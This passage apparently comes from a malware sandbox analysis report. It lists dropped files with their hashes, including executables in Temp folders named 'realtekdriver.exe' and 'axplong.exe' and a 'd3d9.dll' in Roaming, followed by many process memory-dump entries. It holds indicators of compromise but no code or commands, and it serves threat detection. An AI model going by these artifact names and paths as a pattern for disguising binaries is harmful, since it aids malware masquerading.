SHA1a86b16ee4676850bac14c50ee698a39454d0231e
SHA2568a254344702dc6560312a8028e08f844b16804b1fbf4c438c3ca5058d7b65ea1
SHA512a79341ec3407529daa0384de4cac25b665d3b0cb81e52ecada0ebfe37d7616b16da96b47b04f50ce0a6e46d5fced3298a459f78a087c6b6eac4ed444434c5fbe
-
C:\Users\Admin\AppData\Local\Temp\1000135001\realtekdriver.exeFilesize
2.1MB
MD5662404ed188bfab5386fc73a0a7732d4
SHA179ccf9c9015384fe6d7b0245720a2a59a27cebfb
SHA256601c31115b7c8db7e45d8a4386252f8b4a09d49b7d55eb25c9c49932828d718c
SHA512ae90c377177528db849026192e93b0558e0ea5e84953b61e591910c69d2453f5fb73cc431853531bbf6a5c33e2a711620ca6e8e6f061eab7f93f5a8f1caf46d7
-
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exeFilesize
1.9MB
MD5eaa443f37443cb7221d63e0891243384
SHA1d3242326b2ac1ae6e9817a49df33c3a79e209aee
SHA256bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13
SHA5128405c44c1eea8578224eb6495f689d66e4e2f6503c0bf08d3c111e4e307603a35089649296ebf89b76d339c9517a83133b741c655097a9fe319f25aae1f6afdb
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jafjjtuv.faa.ps1Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
\Users\Admin\AppData\Roaming\d3d9.dllFilesize
279KB
MD58fa26f1e37d3ff7f736fc93d520bc8ab
SHA1ad532e1cb4a1b3cd82c7a85647f8f6dd99833bb1
SHA2566c47da8fbd12f22d7272fbf223e054bf5093c0922d0e8fb7d6289a5913c2e45d
SHA5128a0b53cbc3a20e2f0fd41c486b1af1fbbcf7f2fed9f7368b672a07f25faaa2568bbdbcf0841233ac8c473a4d1dee099e90bf6098a6fa15e44b8526efdafc1287
-
memory/64-5394-0x00000000001F0000-0x00000000006C1000-memory.dmpFilesize
4.8MB
-
memory/64-5396-0x00000000001F0000-0x00000000006C1000-memory.dmpFilesize
4.8MB
-
memory/924-68-0x0000000002500000-0x000000000273C000-memory.dmpFilesize
2.2MB
-
memory/924-70-0x0000000002500000-0x000000000273C000-memory.dmpFilesize
2.2MB
-
memory/924-74-0x0000000002500000-0x000000000273C000-memory.dmpFilesize
2.2MB
-
memory/1628-5430-0x00000000001F0000-0x00000000006C1000-memory.dmpFilesize
4.8MB
-
memory/1628-5432-0x00000000001F0000-0x00000000006C1000-memory.dmpFilesize
4.8MB
-
memory/1756-204-0x00007FF7B0FF0000-0x00007FF7B1686000-memory.dmpFilesize
6.6MB
-
memory/2244-61-0x0000000000A70000-0x0000000000BA2000-memory.dmpFilesize
1.2MB
-
memory/2272-0-0x0000000000B20000-0x0000000000FF1000-memory.dmpFilesize
4.8MB
-
memory/2272-15-0x0000000000B20000-0x0000000000FF1000-memory.dmpFilesize
4.8MB
-
memory/2272-5-0x0000000000B20000-0x0000000000FF1000-memory.dmpFilesize
4.8MB
-
memory/2272-3-0x0000000000B20000-0x0000000000FF1000-memory.dmpFilesize
4.8MB
-
memory/2272-2-0x0000000000B21000-0x0000000000B4F000-memory.dmpFilesize
184KB
-
memory/2272-1-0x00000000779B4000-0x00000000779B5000-memory.dmpFilesize
4KB
-
memory/3356-5096-0x0000000008380000-0x0000000008542000-memory.dmpFilesize
1.8MB
-
memory/3356-129-0x00000000052A0000-0x0000000005332000-memory.dmpFilesize
584KB
-
memory/3356-142-0x0000000007E20000-0x0000000007E5E000-memory.dmpFilesize
248KB
-
memory/3356-143-0x00000000088B0000-0x00000000088FB000-memory.dmpFilesize
300KB
-
memory/3356-401-0x0000000006090000-0x00000000060F6000-memory.dmpFilesize
408KB
-
memory/3356-132-0x0000000007EA0000-0x0000000007FAA000-memory.dmpFilesize
1.0MB
-
memory/3356-5095-0x0000000005E40000-0x0000000005E90000-memory.dmpFilesize
320KB
-
memory/3356-127-0x0000000000400000-0x0000000000450000-memory.dmpFilesize
320KB
-
memory/3356-131-0x0000000006630000-0x0000000006C36000-memory.dmpFilesize
6.0MB
-
memory/3356-130-0x0000000005260000-0x000000000526A000-memory.dmpFilesize
40KB
-
memory/3356-5097-0x0000000008F40000-0x000000000946C000-memory.dmpFilesize
5.2MB
-
memory/3356-133-0x0000000007DC0000-0x0000000007DD2000-memory.dmpFilesize
72KB
-
memory/3356-128-0x00000000057A0000-0x0000000005C9E000-memory.dmpFilesize
5.0MB
-
memory/4036-203-0x00000000001F0000-0x00000000006C1000-memory.dmpFilesize
4.8MB
-
memory/4036-205-0x00000000001F0000-0x00000000006C1000-memory.dmpFilesize
4.8MB
-
memory/4036-16-0x00000000001F1000-0x000000000021F000-memory.dmpFilesize
184KB
-
memory/4036-17-0x00000000001F0000-0x00000000006C1000-memory.dmpFilesize
4.8MB
-
memory/4036-18-0x00000000001F0000-0x00000000006C1000-memory.dmpFilesize
4.8MB
-
memory/4036-48-0x00000000001F0000-0x00000000006C1000-memory.dmpFilesize
4.8MB
-
memory/4036-14-0x00000000001F0000-0x00000000006C1000-memory.dmpFilesize
4.8MB
-
memory/4036-172-0x00000000001F0000-0x00000000006C1000-memory.dmpFilesize
4.8MB
-
memory/4272-148-0x0000000000AE0000-0x0000000000B30000-memory.dmpFilesize
320KB
-
memory/4408-5425-0x0000000000A90000-0x0000000000CCC000-memory.dmpFilesize
2.2MB
-
memory/4408-173-0x0000000000A90000-0x0000000000CCC000-memory.dmpFilesize
2.2MB
-
memory/4668-226-0x0000000006E50000-0x0000000007065000-memory.dmpFilesize
2.1MB
-
memory/4668-252-0x0000000006E50000-0x0000000007065000-memory.dmpFilesize
2.1MB
-
memory/4668-264-0x0000000006E50000-0x0000000007065000-memory.dmpFilesize
2.1MB
-
memory/4668-262-0x0000000006E50000-0x0000000007065000-memory.dmpFilesize
2.1MB
-
memory/4668-260-0x0000000006E50000-0x0000000007065000-memory.dmpFilesize
2.1MB
-
memory/4668-258-0x0000000006E50000-0x0000000007065000-memory.dmpFilesize
2.1MB
-
memory/4668-256-0x0000000006E50000-0x0000000007065000-memory.dmpFilesize
2.1MB
-
memory/4668-254-0x0000000006E50000-0x0000000007065000-memory.dmpFilesize
2.1MB
-
memory/4668-250-0x0000000006E50000-0x0000000007065000-memory.dmpFilesize
2.1MB
-
memory/4668-248-0x0000000006E50000-0x0000000007065000-memory.dmpFilesize
2.1MB
-
memory/4668-246-0x0000000006E50000-0x0000000007065000-memory.dmpFilesize
2.1MB
-
memory/4668-244-0x0000000006E50000-0x0000000007065000-memory.dmpFilesize
2.1MB
-
memory/4668-238-0x0000000006E50000-0x0000000007065000-memory.dmpFilesize
2.1MB
-
memory/4668-230-0x0000000006E50000-0x0000000007065000-memory.dmpFilesize
2.1MB
-
memory/4668-228-0x0000000006E50000-0x0000000007065000-memory.dmpFilesize
2.1MB
-
memory/4668-268-0x0000000006E50000-0x0000000007065000-memory.dmpFilesize
2.1MB
-
memory/4668-224-0x0000000006E50000-0x0000000007065000-memory.dmpFilesize
2.1MB
-
memory/4668-242-0x0000000006E50000-0x0000000007065000-memory.dmpFilesize
2.1MB
-
memory/4668-240-0x0000000006E50000-0x0000000007065000-memory.dmpFilesize
2.1MB
-
memory/4668-236-0x0000000006E50000-0x0000000007065000-memory.dmpFilesize
2.1MB
-
memory/4668-234-0x0000000006E50000-0x0000000007065000-memory.dmpFilesize
2.1MB
-
memory/4668-232-0x0000000006E50000-0x0000000007065000-memory.dmpFilesize
2.1MB
-
memory/4668-270-0x0000000006E50000-0x0000000007065000-memory.dmpFilesize
2.1MB
-
memory/4668-5090-0x0000000007270000-0x00000000072BC000-memory.dmpFilesize
304KB
-
memory/4668-5089-0x0000000007210000-0x000000000726A000-memory.dmpFilesize
360KB
-
memory/4668-274-0x0000000006E50000-0x0000000007065000-memory.dmpFilesize
2.1MB
-
memory/4668-272-0x0000000006E50000-0x0000000007065000-memory.dmpFilesize
2.1MB
-
memory/4668-266-0x0000000006E50000-0x0000000007065000-memory.dmpFilesize
2.1MB
-
memory/4668-218-0x0000000000F30000-0x0000000001156000-memory.dmpFilesize
2.1MB
-
memory/4668-219-0x0000000005B00000-0x0000000005D1A000-memory.dmpFilesize
2.1MB
-
memory/4668-5109-0x0000000007DB0000-0x0000000007E04000-memory.dmpFilesize
336KB
-
memory/4668-220-0x0000000006E50000-0x000000000706C000-memory.dmpFilesize
2.1MB
-
memory/4668-222-0x0000000006E50000-0x0000000007065000-memory.dmpFilesize
2.1MB
-
memory/4668-221-0x0000000006E50000-0x0000000007065000-memory.dmpFilesize
2.1MB
-
memory/4908-198-0x00000000004E0000-0x0000000000530000-memory.dmpFilesize
320KB
-
memory/5708-5345-0x0000000009BC0000-0x0000000009BDA000-memory.dmpFilesize
104KB
-
memory/5708-5151-0x0000000009A50000-0x0000000009AF5000-memory.dmpFilesize
660KB
-
memory/5708-5152-0x0000000009C20000-0x0000000009CB4000-memory.dmpFilesize
592KB
-
memory/5708-5122-0x0000000007E30000-0x0000000007E52000-memory.dmpFilesize
136KB
-
memory/5708-5144-0x0000000009920000-0x0000000009953000-memory.dmpFilesize
204KB
-
memory/5708-5145-0x000000006E9A0000-0x000000006E9EB000-memory.dmpFilesize
300KB
-
memory/5708-5146-0x00000000098E0000-0x00000000098FE000-memory.dmpFilesize
120KB
-
memory/5708-5124-0x0000000008140000-0x0000000008490000-memory.dmpFilesize
3.3MB
-
memory/5708-5126-0x00000000088B0000-0x0000000008926000-memory.dmpFilesize
472KB
-
memory/5708-5125-0x0000000008530000-0x000000000854C000-memory.dmpFilesize
112KB
-
memory/5708-5121-0x0000000007800000-0x0000000007E28000-memory.dmpFilesize
6.2MB
-
memory/5708-5350-0x0000000009BB0000-0x0000000009BB8000-memory.dmpFilesize
32KB
-
memory/5708-5120-0x0000000007090000-0x00000000070C6000-memory.dmpFilesize
216KB
-
memory/5708-5123-0x0000000008060000-0x00000000080C6000-memory.dmpFilesize
408KB
-
memory/5776-5447-0x00000000001F0000-0x00000000006C1000-memory.dmpFilesize
4.8MB
-
memory/5928-5414-0x00000000001F0000-0x00000000006C1000-memory.dmpFilesize
4.8MB
-
memory/5928-5412-0x00000000001F0000-0x00000000006C1000-memory.dmpFilesize
4.8MB
-
memory/6064-5105-0x00000000001F0000-0x00000000006C1000-memory.dmpFilesize
4.8MB
-
memory/6064-5103-0x00000000001F0000-0x00000000006C1000-memory.dmpFilesize
4.8MB